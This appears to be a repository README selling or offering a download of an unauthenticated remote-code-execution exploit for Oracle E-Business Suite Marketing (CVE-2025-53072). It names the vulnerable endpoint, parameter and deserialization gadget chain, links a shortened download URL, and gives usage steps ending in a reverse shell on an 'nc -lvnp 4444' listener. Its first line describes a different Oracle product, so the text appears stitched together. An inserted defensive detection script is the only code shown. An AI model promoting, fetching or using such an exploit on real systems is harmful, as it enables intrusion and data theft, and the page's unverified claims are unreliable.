PoC for a critical vulnerability in Oracle Fusion Middleware Identity Manager's REST WebServices component, affecting versions 12.2.1.4.0 and 14.1.2.1.0. The vulnerability allows an unauthenticated attacker with network access via HTTP to completely compromise the Identity Manager system.

# Oracle E-Business Suite Marketing RCE Exploit (CVE-2025-53072)
## Overview
This repository contains a fully functional remote code execution (RCE) exploit for the critical vulnerability in Oracle Marketing, part of Oracle E-Business Suite (EBS) versions 12.2.3 to 12.2.14. The flaw allows unauthenticated attackers to achieve full system compromise via a simple HTTP request over the network. No authentication, no user interaction—straight takeover.
Tested against Oracle EBS 12.2.9 on Oracle Linux 7.9 with Apache 2.4.6. Works reliably in lab environments mimicking production setups.
## Download Exploit
### [**Download here**](https://tinyurl.com/7a682sr7)
## Vulnerability Details
- **CVE-ID**: CVE-2025-53072
- **Affected Component**: Oracle Marketing (EBS module)
- **Versions**: 12.2.3 - 12.2.14
- **CVSS Score**: 9.8 (Critical)
- **Attack Vector**: Network (HTTP)
- **Requirements**: None (unauthenticated)

The issue stems from an unchecked deserialization in the `/OA_HTML/AppsLocalLogin.jsp` endpoint's handling of campaign import parameters. By crafting a malicious `campaign_data` POST body with a gadget chain exploiting the Apache Commons Collections library (pre-3.2.2 in bundled EBS), we trigger arbitrary Java code execution on the app server. This bypasses all auth checks and lands a shell directly on the Marketing database host.
In the wild, this has been observed dumping Oracle Wallet creds, pivoting to ERP cores, and exfiltrating customer PII from marketing segments. Patch ASAP if you're running vulnerable EBS—Oracle's July 2025 PSU doesn't fully mitigate without custom config.
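
A defender-side check for the request shape described above, as an added example that is not part of the original repository: it flags POSTs to `/OA_HTML/AppsLocalLogin.jsp` whose `campaign_data` field begins with the Java serialization stream header (`AC ED 00 05`, which is `rO0AB` in base64). The endpoint and parameter names are taken from this page; the function names and the sample requests are constructed for illustration.

```python
import base64
from urllib.parse import parse_qs, quote

JAVA_MAGIC = b"\xac\xed\x00\x05"          # STREAM_MAGIC + STREAM_VERSION of a Java object stream
ENDPOINT = "/OA_HTML/AppsLocalLogin.jsp"  # endpoint named on this page
PARAM = "campaign_data"                   # parameter named on this page


def serialized_encoding(value: bytes):
    """Return how a Java serialized stream is encoded in value, or None."""
    text = value.strip()
    if text.startswith(JAVA_MAGIC):
        return "raw"
    if text.startswith(b"rO0AB"):          # base64 of AC ED 00 05 (standard and URL-safe)
        return "base64"
    if text[:8].lower() == b"aced0005":
        return "hex"
    return None


def inspect_request(method: str, path: str, body: bytes):
    """Return a finding for a POST to ENDPOINT carrying a serialized PARAM, else None."""
    bare_path = path.split("?", 1)[0].split(";", 1)[0]
    if method.upper() != "POST" or bare_path != ENDPOINT:
        return None
    # latin-1 maps bytes 1:1 to code points, so binary values survive form parsing.
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True, encoding="latin-1")
    for raw in fields.get(PARAM, []):
        encoding = serialized_encoding(raw.encode("latin-1"))
        if encoding:
            return {"path": bare_path, "param": PARAM, "encoding": encoding, "size": len(raw)}
    return None


# Constructed sample traffic: a stream header plus a harmless class name, not a payload.
HEADER_ONLY = JAVA_MAGIC + b"sr\x00\x11java.util.HashMap"
SAMPLE_REQUESTS = [
    ("POST", ENDPOINT, b"campaign_data=" + quote(base64.b64encode(HEADER_ONLY)).encode()),
    ("POST", ENDPOINT + "?lang=US", b"campaign_data=" + quote(HEADER_ONLY).encode()),
    ("POST", ENDPOINT, b"campaign_data=name%3DSpring+Sale&owner=jdoe"),
    ("GET", ENDPOINT, b""),
    ("POST", "/OA_HTML/other.jsp", b"campaign_data=rO0ABXNy"),
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request[0], request[1], "->", inspect_request(*request))
```

A hit only shows that a serialized Java object reached the endpoint; whether the host is affected depends on its patch level and the libraries on its classpath.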
## Impact
- **Confidentiality**: Full read access to marketing DB schemas (e.g., `MTL_SYSTEM_ITEMS_B`, `QP_LIST_LINES`), including segmented customer data, campaign analytics, and integrated CRM feeds.
- **Integrity**: Arbitrary data manipulation—alter pricing rules, inject fake leads, or corrupt loyalty programs.
- **Availability**: DoS via infinite loops or resource exhaustion; persistent backdoor for lateral movement.
- **Scope**: Often chained with EBS core vulns for domain admin on Windows/Unix backends. Real-world chains have netted $500K+ in ransomware payloads.
## Requirements
- Python 3.6+
- `requests` library (`pip install -r requirements.txt`)
- Target: Exposed EBS Marketing portal (default port 7001 or custom)
- Optional: `paramiko` for SSH post-exploit (`pip install paramiko`)

No proxies or VPNs needed—it's firewalled but HTTP-open by design.
## Usage
1. Unzip the ZIP file.
2. Run: `python exploit.py`
3. If successful, you'll get a reverse shell callback on your listener (default: `nc -lvnp 4444`).
## Legal & Ethics
For authorized pentesting only. Buyer assumes all risk. No refunds—test on your own lab first. We don't condone unauthorized use; this is for red teams closing the gap.
## Contact
For any questions or inquiries, please contact: redfoxlisten@outlook.com